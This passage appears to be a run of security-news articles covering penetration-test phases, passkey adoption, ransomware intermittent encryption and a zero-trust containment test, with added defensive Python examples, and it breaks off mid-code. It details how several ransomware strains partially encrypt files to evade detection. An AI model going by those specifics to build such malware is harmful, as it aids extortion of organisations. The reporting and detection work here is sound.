Active data gathering might include networks, operating systems and applications, user accounts, domain names, and mail servers. At the same time, passive techniques or open-source intelligence may use social media, websites, tax information, and other public information.

Some tools used to gather network information include Censys or Shodan. Reconnaissance tools scan public-facing IP addresses and index their response headers, giving pentesters a complete idea of the external networks without having to run scans actively.

The OSINT Framework, used in the data gathering phases of penetration testing, reveals how vast the pool of open-source information available for this stage is. Cipher explains that pentesters use an exhaustive checklist to find open entry points and vulnerabilities within the organization.

3. Scanning or discovery

In this phase, testers look for entry points. Ideally, they seek to identify as many open ports as possible. Several tools are used in this stage to identify the open ports and check network traffic.

The discovery phase consists of scanning and asset analysis using tools such as Nmap, which is a network scanner used to discover hosts and services on a computer network by sending packets and analyzing the responses. In this phase, the tester can gain information on available assets and information, such as operating systems, open ports, and running services.

If the tester runs a white box test, the organization may have already provided the list of IPs to target, assets, and other network information. However, if they are running gray or black box tests, they simulate an actual attack and work without this information. Therefore, this phase is critical when running gray and black box tests.

See the Best Vulnerability Scanning Tools

4. Vulnerability assessment: Gaining access

Using the data gathered during the previous phases, the tester will begin building a threat model and assess vulnerabilities. Targets are identified, and the tester maps the attack vectors.

Pentesters will map and identify areas and high-value assets, such as:

  • Employee data
  • Customer data
  • Partners and supply chain data
  • Technical data
  • Internal and external threats from management
  • Vendors
  • Ports
  • Networks
  • Apps
  • Protocols

Penetration testers can use resources like the National Vulnerability Database (NVD), a repository of vulnerability management data that analyzes software vulnerabilities published in the Common Vulnerabilities and Exposures (CVE) database, EC-Council explains. While manual vulnerability scanning can be done, testers usually use tools like Tenable, Rapid7, Qualys, and Nmap.

Some security organizations refer to this stage as “gaining access.” Imperva explains that testers use web application attacks, such as cross-site scripting, SQL injection, and backdoors, to find vulnerabilities and exploit them by escalating privileges, stealing data, intercepting traffic, and other techniques.

5. Exploitation: Maintaining access

In this stage, testers prove whether the vulnerabilities identified can be exploited. Also known as maintaining access, exploitation is one of the most critical stages because the tester is attempting to breach and access the target system.

In this penetration testing phase, the tester attempts to access the target system and exploit the identified vulnerabilities, typically using a tool like Metasploit, which simulates real-world attacks. Penetration testers are responsible for an organization’s assets, and in this stage, they must ensure the system isn’t compromised or damaged due to their simulations.

Real cyberattacks can range from a couple of minutes to hours, so the vulnerabilities identified in the previous phases must be persistent for them to be exploitable by bad actors. Generally, testers will go after the root or administrator privileges of a device or system.

Metasploit is used because it streamlines finding and executing publicly available exploits for known vulnerabilities. Besides confirming that vulnerabilities are stable, this phase also measures the consequences of a breach: for example, whether the tester could encrypt or exfiltrate data, or simulate zero-day or ransomware attacks, and to what extent.

Also read: Getting Started With the Metasploit Framework: A Pentesting Tutorial

What are the Next Steps After a Penetration Test?

The final stages of a penetration test are reporting and remediation. These phases reveal the next steps for the organization and the pentesters as they wrap up the discovery of vulnerabilities and the consequences of exploiting them. In these stages, the foundations for strengthening security posture are put forward and later implemented.

6. Post-exploitation, reporting, and risk analysis

While most organizations list this step as strictly a reporting stage, other post-exploitation components like clean-up activities need to be included in this stage of the penetration test.

Cipher explains that once the testing is complete and the reports and recommendations are presented, the tester needs to clean up the environment. This means leaving the system exactly as they found it, reverting any access used to breach the IT environment, and restoring any other modifications they made. Clean-up activities also pave the way to remediation, the final phase of penetration testing.

Typical cleanup activities:

  • Removing any executables, scripts, and temporary files from compromised systems
  • Reconfiguring settings back to the original parameters before the pentest
  • Eliminating any rootkits installed in the environment
  • Removing any user accounts created to connect to the compromised system
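The clean-up checklist above is only verifiable if the organization knows what “the original parameters” were. One practical way to check it, added here as example code rather than anything from the article’s sources, is to take an inventory snapshot before the engagement and diff it against a snapshot taken after the tester’s clean-up: accounts, scheduled jobs, listening ports and file hashes that were added or changed are exactly the residue the list describes. The two snapshots, the paths and the hash strings below are constructed placeholders.

```python
"""Verify pentest cleanup by diffing a pre-engagement baseline against a post-test snapshot.

Added example (not from the article). The two snapshots are constructed dicts in
the shape a small inventory script might collect (local accounts, scheduled jobs,
listening ports and file hashes under a few paths); in practice both would be
gathered by the same collection script before and after the engagement.
"""


def snapshot_diff(baseline, current):
    """Return residual changes: items added, removed, or modified since the baseline.

    Each snapshot is {category: {identifier: attributes}}. Anything the test
    introduced that is still present after clean-up appears under 'added';
    settings that were not restored appear under 'modified'.
    """
    report = {"added": [], "removed": [], "modified": []}
    for category in sorted(set(baseline) | set(current)):
        before = baseline.get(category, {})
        after = current.get(category, {})
        for key in sorted(set(before) | set(after)):
            if key not in before:
                report["added"].append((category, key, after[key]))
            elif key not in after:
                report["removed"].append((category, key, before[key]))
            elif before[key] != after[key]:
                report["modified"].append((category, key, before[key], after[key]))
    return report


def cleanup_complete(report):
    """True only when nothing the test introduced, removed or changed remains."""
    return not (report["added"] or report["modified"] or report["removed"])


# Constructed baseline taken before the engagement (hash values are placeholders).
BASELINE = {
    "accounts": {"root": {"uid": 0, "shell": "/bin/bash"},
                 "svc-backup": {"uid": 1001, "shell": "/usr/sbin/nologin"}},
    "cron": {"/etc/cron.d/backup": "0 2 * * * svc-backup /opt/backup/run.sh"},
    "listening": {"tcp/22": "sshd", "tcp/443": "nginx"},
    "files": {"/etc/ssh/sshd_config": "sha256:placeholder-before",
              "/var/www/html/index.html": "sha256:placeholder-index"},
}

# Constructed snapshot after the tester's clean-up: one test account and one
# dropped script are still present, and sshd_config was not restored.
AFTER_CLEANUP = {
    "accounts": {"root": {"uid": 0, "shell": "/bin/bash"},
                 "svc-backup": {"uid": 1001, "shell": "/usr/sbin/nologin"},
                 "pentest-tmp": {"uid": 1002, "shell": "/bin/bash"}},
    "cron": {"/etc/cron.d/backup": "0 2 * * * svc-backup /opt/backup/run.sh"},
    "listening": {"tcp/22": "sshd", "tcp/443": "nginx"},
    "files": {"/etc/ssh/sshd_config": "sha256:placeholder-after",
              "/var/www/html/index.html": "sha256:placeholder-index",
              "/tmp/enum.sh": "sha256:placeholder-script"},
}

if __name__ == "__main__":
    result = snapshot_diff(BASELINE, AFTER_CLEANUP)
    for kind, items in result.items():
        for item in items:
            print(kind, item)
    print("cleanup complete:", cleanup_complete(result))
```

The same diff doubles as a detection aid during the test itself: a blue team that runs the collection script on a schedule sees the tester’s account, script and configuration change as they happen, which is a useful measure of how visible the engagement was.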

The report is considered the most critical document generated by the test. It is the final presentation to the organization that hired the pentester. With the report, organizations can take action, fix vulnerabilities, and strengthen their systems and, if needed, their staff.

Reports need to be clear and transparent. Testers must document all phases, the assets targeted, the type of test and technique, and the vulnerabilities and ramifications discovered. Additionally, guides to fix or patch the vulnerabilities can be included.

Pentesting reports include:

  • Specific vulnerabilities that were exploited
  • Sensitive data that was accessed
  • The amount of time the pen tester was able to remain in the system undetected

It is normal practice for an organization to request sanitized example reports from pentesters before they hire their services. This allows them to view the standards and details used by the vendor. Good penetration test reports have findings well-organized and prioritized by risk level.

See also: Testing & Evaluating SIEM Systems: A Review of Rapid7 InsightIDR

7. Remediation

Remediation is the final phase of a penetration test, and it falls within the organization’s responsibilities. Using the report and findings and the information they have from interacting with the pentester, especially if a white box pentest was done, organizations can begin to make changes to their systems to fix the vulnerabilities that have been revealed.

Remediation can be very challenging for organizations that do not have the resources. Therefore, reports that include guides for remediation are the most valued. After remediation, the phases will often restart to test updates or other systems or run different types of penetration testing.

Understanding the phases of penetration testing is vital for the industry to continue to build resilience in the face of increased cyberattacks. Cyber criminals use techniques to bypass automated and traditional cybersecurity solutions. Simulating real attacks with penetration tests is proving to be one of the most effective tools the security industry has today.

Read next: Penetration Testing vs. Vulnerability Testing: An Important Difference

The Challenges Facing the Passwordless Future

Published Sun, 25 Sep 2022 13:00:00 +0000 at https://www.esecurityplanet.com/applications/passwordless-challenges/
For years the tech industry has promised a shift toward a passwordless future. In 2013, for example, the FIDO Alliance was created to solve the world’s password problem by replacing login technology.

Google, Paypal, and Lenovo were among the original FIDO founding members. By 2015, Microsoft joined, and in 2020, Apple followed. The road to a passwordless world has been slow, but seems to have accelerated in the past year, helped in part by Microsoft’s move to passwordless sign-on.

Apple has also promised that passwords will be a thing of the past, and passkeys will become available for iOS 16. Microsoft is already providing passwordless features to Azure Active Directory, and for Google, multi-factor authentication (MFA) has become mandatory.

While big tech phases in new authentication solutions, Dashlane — a password manager used by more than 20,000 companies and more than 15 million users — made a full switch.

Dashlane last month integrated passkeys into its cross-platform password manager. Users can now set up passkeys in Dashlane to log into sites and apps, replacing traditional passwords.

Dashlane took a different passkey approach from the one Microsoft, Google, and Apple have embarked on, which requires users to interact with their phone to log in by scanning QR codes or by using face or fingerprint recognition or PIN codes. Dashlane claims its process is simpler because it has apps for most platforms and extensions for most browsers, requiring less action from users to authenticate their access.

But beyond these cases, how advanced is the implementation of the technology that wants to end passwords once and for all?

See the Top Password Managers

The Natural Log-in Evolution

eSecurity Planet spoke with Aarti Dhapte, senior research analyst at Market Research Future, to understand how big the passkey market is, what technical challenges it faces, and what the security, legal, and ethical implications are that affect the sector.

The senior research analyst says the industry sees passkeys as the solution to the many password problems and is heavily investing in them. The passkey market size in 2021 was $158.7 million and is expected to reach $3.4 billion by 2030 — a stunning 2,000% increase in less than a decade.

Dhapte explains that passkeys are a natural next step. Driven by significant tech investments — responsible for pushing the new authentication technology — the industry and users have been getting accustomed to the latest tech, first with two-factor authentication (2FA), followed by MFA and now with passkeys.

However, the challenges to making this global shift are significant. Hardware and software, devices, and websites still need to level up.

For example, the widespread use of biometrics is only possible thanks to new smartphone technology, which has the capacity to run the required neural network needed to accurately power the algorithms and sensors that read faces and fingerprints. In similar ways, companies like Apple and Google are taking further steps and changing their phone software and online browsers to support passkey technology now.

Market Research Future advises tech companies that want to join the movement to go through the natural steps of evolution and first deploy 2FA as a starting point.

“After that, progress to MFA,” said Dhapte. “It allows users to become accustomed to the passwordless experience before making the complete change.”

Dhapte said that MFA educates workers on biometrics, smart cards, and other passwordless technologies, lowering friction during future full-passwordless onboarding procedures.

See the Top Identity & Access Management tools

The Challenges of New Authentication Technologies

While the use of passwords is expected to decline over time, industry experts and vendors say that adopting new technologies will be tedious and time-consuming.

“Opinions on the future of passwords remain divided, but hope for a password-free industry continues,” Dhapte says.


One of the main challenges is that passwords will continue to exist in older systems and legacy tech. Another challenge is users’ misconception about passkeys, often expecting completely frictionless access. However, passkeys are a form of a password; to some extent, users have been using them for some time.

“They are nothing that most people haven’t seen or used before. Many banks and financial applications, including Mint, now employ Face ID or Touch ID,” said Dhapte. “From where consumers stand, that is precisely how passkeys will work: Users will verify with their face or fingerprint.”

The technology built to make users’ lives easier has a set of problems that make its “behind-the-scenes” technical processes very complex. Compatibility is one of these problems. Passkeys, unlike passwords, are not saved on a site but on a device. But if users generate a passkey with a device, they should also be able to access the site or app, even when using another device.

Google, like Apple, assures it will guarantee compatibility. Apple solves this issue by syncing passkeys with the iCloud Keychain, making them available across Apple devices, but what if the users want to log in from a Windows-based computer? Linking access to all apps, services, and sites to one device or cloud, without a doubt, presents security and convenience issues.

Additionally, for passkeys to become a mainstream technology, most companies and organizations must adopt them, and users must buy new devices that support the tech. But without the resources and technological tools, many are left out of the movement.

“Websites will retain existing passwords. They have to since it will be decades before every user has the appropriate hardware and software,” Dhapte said. According to Dhapte, even if some consumers can afford a new device, websites will not remove all password authentication because they risk losing other users.

The account recovery element of passkeys is another double-edged sword. While a consumer application will almost certainly be pleased to outsource account recovery to Apple, Google, or Microsoft, many administrators may not be.

Security, Legal and Ethical Implications

Storing all passkeys on a single device can become a security nightmare if a phone is lost, stolen, or physically accessed. Even changing phones is not a streamlined process when using 2FA and MFA, especially considering the average number of services and sites users access every week.

On the other hand, while passkeys may do much to stop email phishing, as biometrics won’t be an easy target, cyber criminals can turn to other malware to remotely hack and unlock a phone. These types of attacks are expected to increase. Biometrics is presented as the solution to this security issue. But some are not fully convinced.

A few years ago, a security hacker — Jan Krissler, alias Starbug — demonstrated this vulnerability by utilizing a high-resolution photo of German Defense Minister Ursula von der Leyen’s thumb and “reconstructing it with commercial software to demonstrate the relative simplicity of fingerprint identity theft,” Dhapte said.

Additionally, in 2020, Cisco Talos discovered that some fingerprint scanning equipment could be bypassed using 3D-printed fingerprints.

Biometrics controls and controversies

Live checks, which are still in the process of being perfected, have since been deployed to make it more challenging for cyber criminals to breach biometrics. And how biometric data is stored, managed, and deleted has also progressed.

Today, the most advanced biometrics systems never store video, fingerprints, or other raw data. They convert the data into templates that, even if leaked or breached, cannot be used to hack an account.

The use of biometrics also comes with ethical and legal costs. The risk of misuse is significant. Identity, citizenship, and surveillance are all societal concerns.

“Biometric identity raises broader concerns about citizenship, monitoring, and human rights,” Dhapte said.

These dangers are exacerbated by a lack of standards, regulatory safeguards, ecosystem collaboration, and broad public knowledge.

“Varied legal coverage (for customers vs. workers, for example) by industry, variable recourse, and precedents all contribute to a perplexing compliance effort with various legal difficulties,” Dhapte added.

Companies that do not protect biometric data can face legal consequences, reputation damages, fines, and other penalties. The European Union General Data Protection Regulation (GDPR) considers biometric data as sensitive data that requires the informed consent of the involved person. In the U.S., several federal and state laws regulate data security and biometrics.

In 2008, Illinois became the first U.S. state to enact biometric legislation with the Biometric Information Privacy Act (BIPA). More than 25 states followed, passing biometric laws. These include Texas, Washington, California, New York, Louisiana, Oregon, and Arkansas. These state laws regulate how companies collect, retain, disclose, and destroy biometric information, and for what purposes.

Biometric lawsuits have already reached the U.S. Supreme Court. In Cothron v. White Castle System, Inc., employees filed a class-action lawsuit against the company for scanning their fingerprints without asking for prior consent. If the Supreme Court rules against the company, the penalties are so severe that it could lead to the company’s bankruptcy. As biometric technology continues to be adopted, a rise in related lawsuits can be expected.

In today’s technological environment, cryptography is frequently employed as a method of information security. It has been used in everyday home objects, e-commerce, email, and other internet-based services. The rising dependence on cryptographic technologies has highlighted many worldwide ethical and security concerns.

“Cryptography’s problems focus on intellectual property and copyright issues, hence a matter of information access. Indeed, encryption is the foundation for copyright and access permission in digital contexts,” Dhapte added.

Awaiting the future

Passwords will continue to evolve, and passkeys are poised to take over. Whether the ride will be gradual or abrupt is yet to be fully seen. The passwordless future is paved with serious challenges, and an honest debate about its realities and processes should unfold before its global implementation.

“We will have to wait for all the companies involved to provide their passkey implementations before we can comprehend the full effect and possible mitigations,” Dhapte said.

Read next: New Quantum-safe Cryptography Standards Arrive None Too Soon

Ransomware Groups Turn to Intermittent Encryption to Speed Attack Times

Published Wed, 21 Sep 2022 17:57:06 +0000 at https://www.esecurityplanet.com/threats/ransomware-intermittent-encryption/
During a cyberattack, time is of the essence for both attackers and defenders. To accelerate the ransomware encryption process and make it harder to detect, cybercriminal groups have begun using a new technique: intermittent encryption.

Intermittent encryption lets ransomware encrypt only parts of each file rather than the whole file. The technique is designed to speed up attacks, reducing the chances that the activity is detected and the threat shut down before encryption completes.

Sentinel Labs reported the new trend earlier this month as ransomware groups adopted the technique. It was advertised on a forum to attract buyers, fueling the Ransomware-as-a-Service (RaaS) trade. Not only can intermittent encryption accelerate the time-intensive process of ransomware encryption, it can also help the malware evade detection.

Ransomware detection systems rely on statistical analysis, with some tools measuring the intensity of I/O operations or comparing successive versions of a file. Because encryption is aggressive, these tools pick up the activity when ransomware begins encrypting files. Intermittent encryption, however, does not touch the entire file, so it is a “lighter” process that generates less file I/O. This makes intermittent encryption a stealthier operation that can evade normal detection tools.

The intermittent encryption trend began with LockFile in mid-2021, and Black Basta, ALPHV (BlackCat), PLAY, Agenda, and Qyick have since embraced the technique. Different ransomware groups and strains offer different types of intermittent encryption. Some are written in Go and can be customized; others are fully automated. Some encrypt only the first part of each file, while others encrypt a file in intervals, skipping bytes between them.

See our complete guide to Preventing, stopping and recovering from ransomware attacks

Qyick Ransomware: ‘What the cool kids are using’

The time it takes to encrypt a system and its files depends on several factors: the speed of the encryption routine, the size of the file or files, and the system on which the encryption runs.

In March 2022, Splunk tested ten different ransomware families and ten samples for each family and executed 400 encryption tests to time the results. During the tests, the strains had to encrypt a total of 53GB and 98,561 files. Different host system hardware and OS configurations were deployed to make the simulation as real as possible.

LockBit came out on top with a total encryption time of 5 minutes and 50 seconds, Babuk came in second with 6 minutes and 34 seconds, and Avaddon, Ryuk, and REvil all completed the test in under 25 minutes. BlackMatter, DarkSide, and Conti did it in under one hour, and other strains like Maze or Mespinoza (PYSA) completed the encryption in almost 2 hours.

Why is the time of attack important? If organizations have only a couple of minutes to respond to a ransomware encryption attack, they might choose to focus their cybersecurity efforts on prevention and countermeasures early in the ransomware lifecycle instead of on detection and mitigation. The new intermittent encryption tools suggest this hypothesis should be taken seriously.

In August, Sentinel Labs observed a new advertisement for ransomware called Qyick, posted in a popular forum by a user named lucrostm (image below). Lucrostm promised intermittent-encryption ransomware with unmatched speed. Selling for 0.2 to about 1.5 Bitcoin, depending on the customization required by the buyer, Qyick’s intermittent encryption and its implementation in Go brought it onto the ransomware threat scene.

“Notably, Qyick features intermittent encryption, which is what the cool kids are using as you read this,” the RaaS post said. “Combined with the fact that it is written in Go, the speed is unmatched.”

The post assures buyers that each build is unique and that the code supports synchronized execution, allowing the ransomware to spread through the whole network before the SOC can limit it by shutting down non-infected services. It also claims obfuscation and support for multiple addresses.

While Qyick does not offer automatic data exfiltration, leaving that for the attacker to carry out before encryption, the seller promised that the feature was in development, along with anti-forensic capabilities and others.

Image: RaaS forum post advertising Qyick intermittent encryption

Also read: Exfiltration Can Be Stopped With Data-in-Use Encryption, Company Says

Agenda and BlackCat Ransomware Encryption

Image: Agenda’s customizable intermittent encryption options (source: Sentinel Labs)

Another strain using intermittent encryption is the Agenda ransomware. Written in Go and used mainly to target healthcare and education organizations in Africa and Asia, this strain offers customizable, easy-to-configure options that change how the encryption behaves. The filename extension and the services to terminate can also be customized.

The three possible partial encryption modes of Agenda are:

  • skip-step [skip: N, step: Y] – Encrypt every Y MB of the file, skipping N MB.
  • fast [f: N] – Encrypt the first N MB of the file.
  • percent [n: N; p:P] – Encrypt every N MB of the file, skipping P MB, where P equals P% of the total file size.

On the other hand, BlackCat (or ALPHV) ransomware, rising in late 2021 as the first ransomware written in the Rust programming language, also executes most of its encryption as intermittent encryption.

BlackCat was reverse-engineered by Sentinel Labs researcher Aleksandar Milenkoski.

Milenkoski outlines the different encryption modes of BlackCat as:

  • Full – Encrypt all file content.
  • HeadOnly [N] – Encrypt the first N bytes of the file.
  • DotPattern [N,Y] – Encrypt every N bytes of the file with a step of Y bytes.
  • SmartPattern [N,P] – Encrypt the first N bytes of the file. BlackCat divides the rest of the file into equal-sized blocks, each 10% of the rest of the file in size, and encrypts P% of the bytes of each block.
  • AdvancedSmartPattern [N,P,B] – Encrypt the first N bytes of the file. BlackCat divides the rest of the file into B equal-sized blocks and encrypts P% of the bytes of each block.
  • Auto – Combinatory file encryption mode. Encrypt the file’s content according to one of the modes Full, DotPattern [N,Y], or AdvancedSmartPattern [N,P,B]. BlackCat selects and parametrizes the mode based on the filename extension and the file size.

Analysis shows that BlackCat noticeably reduced encryption time: the reduction in wall-clock processing time started at 8.65 seconds for a 5 GB file and reached a maximum of 1.95 minutes for a 50 GB file. This includes the time it takes to read, encrypt, and write each file’s content.

The BlackCat ALPHV threat group is known for being an early adopter of extortion schemes, threatening their victims with DDoS attacks, and leaking exfiltrated data online.

Black Basta and PLAY Ransomware: Automated Chunks

Image: Sentinel Labs analysis of Black Basta intermittent encryption

Black Basta and PLAY also offer intermittent encryption, but it cannot be configured by the user.

Black Basta, the RaaS program that emerged in 2022 written in the C++ programming language, bases the intermittence of its encryption on the size of the file. For files under 704 bytes, it encrypts the entire file. For files under 4 kilobytes, it encrypts every 64 bytes, starting from the beginning of the file and skipping 192 bytes. Finally, for files larger than 4 KB, it does the same but skips 128 bytes between the encrypted intervals.

PLAY ransomware, another 2022 player, also varies its encryption on file size, but instead, it just breaks the file into 2, 3, or 5 chunks, depending on the file size, and then encrypts every other chunk.

Sentinel Labs analysis shows that PLAY will create:

  • 2 chunks if the file size is less than or equal to 0x3fffffff bytes;
  • 3 chunks if the file size is less than or equal to 0x27fffffff bytes;
  • 5 chunks if the file size is greater than 0x280000000 bytes.
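
One way a defender can look for the interleaved plaintext and ciphertext that intermittent encryption leaves behind is to score each block of a file for entropy instead of the file as a whole; this is an added example, not code from the article or from Sentinel Labs. The block size, thresholds and sample data are assumptions, and the partially encrypted sample is constructed to mimic the every-other-chunk layout described above for PLAY.

```python
"""Triage a file for intermittent (partial) encryption by block-wise entropy.

Added example, not code from the eSecurity Planet article or Sentinel Labs.
Intermittent encryption leaves plaintext and ciphertext interleaved inside one
file, so a single whole-file entropy score lands in the middle and can be
missed; scoring each fixed-size block separately exposes the pattern.
Block size and thresholds are assumptions tuned for the constructed samples.
"""
import math
import random

BLOCK_SIZE = 4096      # assumed granularity (one filesystem-sized block)
HIGH_ENTROPY = 7.0     # bits/byte: random-looking (ciphertext or compressed data)
LOW_ENTROPY = 6.0      # bits/byte: clearly structured plaintext


def shannon_entropy(block: bytes) -> float:
    """Shannon entropy in bits per byte of one block (0.0 for empty input)."""
    if not block:
        return 0.0
    counts = [0] * 256
    for b in block:
        counts[b] += 1
    n = len(block)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def block_entropies(data: bytes, block_size: int = BLOCK_SIZE) -> list:
    """Entropy of each consecutive block of the file."""
    return [shannon_entropy(data[i:i + block_size])
            for i in range(0, len(data), block_size)]


def classify(data: bytes, block_size: int = BLOCK_SIZE) -> tuple:
    """Return (verdict, fraction_of_high_entropy_blocks).

    'plaintext'    - no high-entropy blocks
    'full'         - every block is high entropy (whole file encrypted, or a
                     compressed/packed format; confirm with the file type)
    'intermittent' - high- and low-entropy blocks coexist, the signature of
                     partial encryption such as PLAY's every-other-chunk layout
    'mixed'        - intermediate scores only; inconclusive
    """
    scores = block_entropies(data, block_size)
    if not scores:
        return ("plaintext", 0.0)
    high = sum(1 for s in scores if s >= HIGH_ENTROPY)
    low = sum(1 for s in scores if s <= LOW_ENTROPY)
    fraction = high / len(scores)
    if high == len(scores):
        return ("full", fraction)
    if high and low:
        return ("intermittent", fraction)
    if high == 0 and low == len(scores):
        return ("plaintext", 0.0)
    return ("mixed", fraction)


# Constructed samples (not real ransomware output): 16 blocks of 4 KiB each.
_rng = random.Random(2022)
_SENTENCE = b"Quarterly report: revenue grew 12% while costs stayed flat. "
PLAINTEXT = (_SENTENCE * (16 * BLOCK_SIZE // len(_SENTENCE) + 1))[:16 * BLOCK_SIZE]
FULLY_RANDOM = _rng.randbytes(16 * BLOCK_SIZE)


def _partially_encrypted() -> bytes:
    """Plaintext with every other 4 KiB block replaced by random bytes, a
    stand-in for the alternating-chunk layout the article attributes to PLAY."""
    out = bytearray(PLAINTEXT)
    for i in range(0, len(out), 2 * BLOCK_SIZE):
        out[i:i + BLOCK_SIZE] = _rng.randbytes(BLOCK_SIZE)
    return bytes(out)


PARTIAL = _partially_encrypted()

if __name__ == "__main__":
    for name, sample in (("plaintext", PLAINTEXT), ("partial", PARTIAL),
                         ("random", FULLY_RANDOM)):
        print(name, classify(sample))
```

Byte-level interleaving such as Black Basta’s 64-byte runs blends inside a 4 KiB block and scores as “mixed”; catching that needs a block size matched to the run length and thresholds scaled to it.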

Whether the intermittent encryption is customizable or automatic, when combined with automated data exfiltration tools it can significantly shorten the ransomware attack lifecycle.

Security experts warn that given the benefits these new encryption technologies provide, cybercriminals will embrace them and intensify their use.

Faced with this new trend, organizations are forced to switch to early prevention and focus on the early stages of ransomware attacks, as detecting and shutting down attacks once they are in full play promises to be very challenging.

As always, well protected data backups are your best hope for a quick recovery – see the Best Backup Solutions for Ransomware Protection.

Zero Trust Speeds Ransomware Response, Illumio-Bishop Fox Test Finds https://www.esecurityplanet.com/networks/zero-trust-ransomware-test/ Wed, 10 Aug 2022 21:13:06 +0000

From mass production of cheap malware to ransomware as a service (RaaS), cyber criminals have industrialized cybercrime, and a new HP Wolf Security report warns that cybercriminals are adapting advanced persistent threat (APT) tactics too. That means hackers will increasingly mimic nation-state threat groups by establishing a long-term presence inside networks to mine highly sensitive data.

Additionally, attacks are poised to become even more damaging as companies expand their digital footprint and the attack surface grows. This is one reason organizations across industries and geographies are turning to zero-trust architectures to fortify their security posture.

Zero trust implies that every access and connection made to a point of the network is reevaluated and re-authenticated to ensure the user and connection are authorized, with no more access than the user’s role requires.

But how effective is zero trust? That’s an especially important question given the recent emphasis on the technology – including from the White House.

To answer that question, Illumio, a zero trust segmentation (ZTS) vendor, engaged Bishop Fox, a leader in offensive security, to measure how effective zero trust is in detecting and containing ransomware attacks. The company put its zero trust solutions to the test by simulating attacks based on real threat actors’ tactics, techniques, and procedures. The results were announced today at the Black Hat USA 2022 cybersecurity conference.

See the Best Zero Trust Security Solutions

Zero Trust Security Testing

Bishop Fox’s report found that Illumio’s zero trust segmentation technology “significantly improves an organization’s ability to detect, contain, and proactively limit the available attack surface.” ZTS can also be applied to effectively isolate compromised hosts during an active attack, the report said.

Bishop Fox ran four ransomware attack scenarios: a control test with no Illumio ZTS deployed; detection and response; pre-configured static protection; and full application ring-fencing with ZTS. They found that the stricter the ZTS policy, the faster security teams can detect and stop an ongoing attack.

The attack simulations where no ZTS was deployed breached and compromised the system in 2.5 hours. On the other hand, in the simulation with full app ring-fencing policies enforced, the attack was detected and stopped in just 10 minutes.

“ZTS can be used in a proactive fashion to ring-fence entire environments and applications, drastically reducing the pathways available for exploit through lateral movement,” Bishop Fox said.

The other two simulation scenarios also showed that the zero trust protections were superior. Attacks simulated with preconfigured static protection were stopped in 24 minutes, and those with detection and response were blocked in 38 minutes.

“If an organization chooses to invest in zero-trust strategies, including zero trust segmentation, it will find that, compared to an environment that simply implements a detection and response approach, the organization is four times faster to contain a bad actor and minimize the impact of a breach,” said Raghu Nandakumara, head of industry solutions at Illumio.

The report also found that ZTS can play a critical role in covering endpoint detection and response (EDR) blind spots. EDR gains visibility on what’s happening on an organization’s endpoints by capturing activity data. However, organizations are learning the hard way that cyber criminals commonly use EDR blind spots.

Bishop Fox’s report states that, in terms of data collection, Illumio’s telemetry was especially useful for covering some EDR blind spots where the preconfigured EDR alerts did not properly detect attacker activity.

“In a particular scenario where the red team performed more evasive maneuvers, Bishop Fox properly identified a suspicious traffic pattern using Illumio’s telemetry combined with EDR alerts,” Bishop Fox said.

Also read: Why You Need to Tune EDR to Secure Your Environment

Ransomware: Breach and Attack Simulations

To assess Illumio ZTS, Bishop Fox’s assessment team chose an infrastructure-as-code solution. The environment was based on the Splunk Attack Range open-source project but modified to include more hosts and to deploy a more complete Active Directory configuration.

The test environment was made of the following resources:

  • Five Windows Server 2019 instances representing hosts in a corporate network
  • Five Windows Server 2019 instances representing hosts in a staging network
  • Five Windows Server 2019 instances representing hosts in a production network
  • One Windows Server 2019 acting as a domain controller
  • One Ubuntu 18.04 server running a Splunk server

All Windows instances ran a Splunk Universal Forwarder agent and a System Monitor (Sysmon) service configured with the default Splunk Attack Range configuration. These instances were also deployed with the default configuration of Nextron Systems’ Aurora EDR agent, including the default set of Sigma rules.

All Windows hosts had the following remote administrative services enabled:

  • Windows Remote Management (WinRM)
  • Remote Desktop Protocol (RDP)

The Illumio VEN agent was installed during instance provisioning on top of that configuration.

The Bishop Fox team based their attack techniques on real-world attacks, creating playbooks from known active ransomware threat groups such as Conti. The attack aimed to identify available assets, execute lateral movement, and escalate privileges within the system in order to finally deploy the ransomware across the domain-joined systems.

Image: Group Policy discovery, attack simulation scenario 1 (no ZTS deployed)

Full Application Ring-fencing Attack Simulation

The fourth scenario, the full application ring-fencing simulation, showed the best results in time to identify and stop a ransomware attack, accomplishing both in just 10 minutes.

In the scenario used, the microsegmentation policy consisted of the following rules:

  • Database workloads in one environment could not connect to other environments.
  • API workloads in one environment could not connect to other environments.
  • The Jump host workload from the Corporate environment could access every host in the Staging environment using RDP.
  • The Jump host workload from the Staging environment could access every host in the Production environment using RDP.
  • Every workload could communicate with the domain controller.
  • Every workload could access public SMB shares in all environments.
  • Every workload could communicate to the internet on the following ports:
    • 443/TCP
    • 80/TCP
    • 53/TCP
    • 53/UDP
    • 123/UDP
  • RDP access was authorized from the internet to API workloads in the Corporate network as an entry point for the attacker.
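
The ring-fencing rules above, expressed as a deny-by-default policy model that checks sample flows such as the attacker’s RDP entry point and an attempted lateral move. This is an added example, not Illumio’s policy language or the report’s own code; the role names, the “internet” pseudo-environment, the port numbers for RDP and SMB, and the precedence between the rules are assumptions.

```python
"""Deny-by-default model of the full ring-fencing policy from the fourth scenario.

Added example; not Illumio's policy language or Bishop Fox's test harness.
Each rule listed in the article is encoded as a predicate over a flow.
Assumptions made for this model (not details from the report): the role names,
an "internet" pseudo-environment, RDP on 3389/TCP and SMB on 445/TCP, the domain
controller and public shares treated as shared services reachable from every
workload, the environment restriction on database and API workloads applying
only to the three workload environments, and deny taking precedence over the
remaining allow rules.
"""
from dataclasses import dataclass

ENVIRONMENTS = {"corporate", "staging", "production"}
RDP = ("tcp", 3389)
SMB = ("tcp", 445)
INTERNET_EGRESS = {("tcp", 443), ("tcp", 80), ("tcp", 53), ("udp", 53), ("udp", 123)}


@dataclass(frozen=True)
class Flow:
    src_env: str   # one of ENVIRONMENTS, or "internet"
    src_role: str  # e.g. "database", "api", "jump", "web", "any"
    dst_env: str
    dst_role: str  # also "dc" (domain controller) and "smb" (public share)
    proto: str     # "tcp" or "udp"
    port: int

    @property
    def service(self):
        return (self.proto, self.port)


def shared_service(f: Flow) -> bool:
    """Every workload may reach the domain controller and public SMB shares."""
    if f.src_env not in ENVIRONMENTS:
        return False
    return f.dst_role == "dc" or (f.dst_role == "smb" and f.service == SMB)


def denied(f: Flow) -> bool:
    """Database and API workloads may not connect to other environments."""
    return (f.src_role in {"database", "api"}
            and f.dst_env in ENVIRONMENTS and f.dst_env != f.src_env)


def allowed_by_rule(f: Flow) -> bool:
    """Explicit allow rules from the scenario's microsegmentation policy."""
    if f.src_env == "internet":
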